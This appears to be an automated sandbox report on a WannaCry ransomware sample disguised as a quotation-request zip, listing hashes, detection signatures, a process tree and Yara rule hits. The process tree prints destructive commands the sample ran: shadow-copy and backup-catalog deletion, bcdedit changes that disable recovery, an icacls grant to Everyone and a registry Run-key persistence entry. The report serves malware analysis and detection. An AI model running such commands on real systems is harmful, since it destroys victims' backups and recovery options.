Windows Analysis Report
Request for Quotation (RFQ_196).zip.zip

Overview

General Information

Sample name:Request for Quotation (RFQ_196).zip.zip
Analysis ID:1375296
MD5:2747028c2334ea64ada17b371c9eb469
SHA1:ba52213356b615f2fd08d69191b325d0abe7f8f6
SHA256:f905bfd1b61ce94eb6d9d5d69157583416b6fc79dd5e4507e98fee7f537b19a0
Infos:

Detection

Wannacry, Conti
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected Wannacry Ransomware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Delete shadow copy via WMIC
Yara detected Conti ransomware
Yara detected Wannacry ransomware
Command shell drops VBS files
Contains functionality to detect sleep reduction / modifications
Creates files in the recycle bin to hide itself
Deletes shadow drive data (may be related to ransomware)
Drops PE files to the document folder of the user
Found Tor onion address
Found stalling execution ending in API Sleep call
Installs TOR (Internet Anonymizer)
May use the Tor software to hide its network traffic
Modifies existing user documents (likely ransomware behavior)
Moves itself to temp directory
Tries to harvest and steal browser information (history, passwords, etc)
Uses bcdedit to modify the Windows boot settings
Uses cmd line tools excessively to alter registry or file data
Writes many files with high entropy
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Installs a Chrome extension
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

  • System is w10x64_ra
  • rundll32.exe (PID: 3788 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • 7zG.exe (PID: 6648 cmdline: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\" -an -ai#7zMap4588:126:7zEvent8780 MD5: 50F289DF0C19484E970849AAC4E6F977)
  • 7zG.exe (PID: 5848 cmdline: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\" -an -ai#7zMap12385:118:7zEvent28652 MD5: 50F289DF0C19484E970849AAC4E6F977)
  • Proforma Invoice and Bank swift-REG.PI-0086547654.exe (PID: 3796 cmdline: "C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" MD5: 84C82835A5D21BBCF75A61706D8AB549)
    • attrib.exe (PID: 7028 cmdline: attrib +h . MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 3268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • icacls.exe (PID: 1004 cmdline: icacls . /grant Everyone:F /T /C /Q MD5: 2E49585E4E08565F52090B144062F97E)
      • conhost.exe (PID: 2524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskdl.exe (PID: 6744 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • cmd.exe (PID: 3356 cmdline: C:\Windows\system32\cmd.exe /c 118491705402797.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cscript.exe (PID: 6324 cmdline: cscript.exe //nologo m.vbs MD5: CB601B41D4C8074BE8A84AED564A94DC)
    • taskdl.exe (PID: 6328 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 3624 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1436 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 2320 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1248 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 4468 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6516 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1060 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 3504 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5728 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6940 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 4652 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6280 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 4936 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6172 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 2612 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 3772 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 7076 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6212 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6056 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 2656 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 2272 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6652 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5956 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 4236 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6500 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5920 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5412 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5392 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5968 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5448 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 348 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 180 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6004 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5388 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6012 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 3696 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6108 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5668 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6568 cmdline: @WanaDecryptor@.exe co MD5: 7BF2B57F2A205768755C07F238FB32CC)
      • taskhsvc.exe (PID: 1220 cmdline: TaskData\Tor\taskhsvc.exe MD5: FE7EB54691AD6E6AF77F8A9A0B6DE26D)
        • conhost.exe (PID: 2184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5500 cmdline: cmd.exe /c start /b @WanaDecryptor@.exe vs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • @WanaDecryptor@.exe (PID: 6196 cmdline: @WanaDecryptor@.exe vs MD5: 7BF2B57F2A205768755C07F238FB32CC)
        • cmd.exe (PID: 5720 cmdline: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 6576 cmdline: wmic shadowcopy delete MD5: E2DE6500DE1148C7F6027AD50AC8B891)
    • taskdl.exe (PID: 6256 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 4672 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • cmd.exe (PID: 4376 cmdline: cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ubykpkpwzybxbgo789" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 7096 cmdline: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ubykpkpwzybxbgo789" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • taskdl.exe (PID: 6964 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1176 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 1116 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 3568 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6584 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6640 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7116 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 1344 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6524 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 2232 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2540 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3120 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 7136 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 1568 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 5688 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 3076 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 4184 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2900 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 2512 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 4964 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6884 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 5292 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 5544 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4864 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 5152 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 2652 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2916 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 4680 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6296 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 5368 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 4756 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6668 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6456 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 1252 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 5512 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2300 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 720 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6776 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 5780 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6928 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 5572 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6320 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 3924 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3792 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 1504 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6324 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3352 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4012 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3400 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 7060 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 3272 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 5632 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 4440 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4468 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6264 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 3324 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 3764 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 4472 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6940 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4652 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 5532 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6348 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6572 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6472 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6468 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6172 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3440 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 336 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6128 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 432 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6056 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2656 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 2904 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6652 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4444 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3040 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 5280 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 5964 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 5328 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 5392 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 5968 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 5448 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 1012 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 5596 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 5492 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 2244 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 4320 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2220 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3340 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 2312 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 564 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 5500 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 3220 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 7024 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • dllhost.exe (PID: 7096 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
    • @WanaDecryptor@.exe (PID: 6832 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6464 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 1176 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 4316 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 1316 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 7152 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6792 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6648 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7116 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6632 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2684 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6712 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 2540 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 3120 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6764 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6188 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 700 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7136 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 3192 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 1700 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 1968 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 2528 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4184 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6560 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6888 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6368 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 5236 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4908 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 1076 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 2008 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 5220 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 1948 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 5336 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2824 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 4648 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6576 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6416 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6296 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4744 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
  • cleanup
Name: WannaCryptor, WannaCry, WannaCrypt
Attribution: Lazarus Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor

Name: Conti, Conti Lock
Description: Conti is an extremely damaging ransomware due to the speed with which it encrypts data and spreads to other systems. It was first observed in 2020 and it is thought to be led by a Russia-based cybercrime group that goes under the Wizard Spider pseudonym. In early May 2022, the US government announced a reward of up to $10 million for information on the Conti ransomware gang.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.conti
No configs have been found
Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Author: Florian Roth
  • 0x2c0:$s1: A: Don't worry about decryption.
  • 0x0:$s2: Q: What's wrong with my files?
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Author: Joe Security

Source: 0000000A.00000002.3004531388.000000000040F000.00000004.00000001.01000000.00000006.sdmp, Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
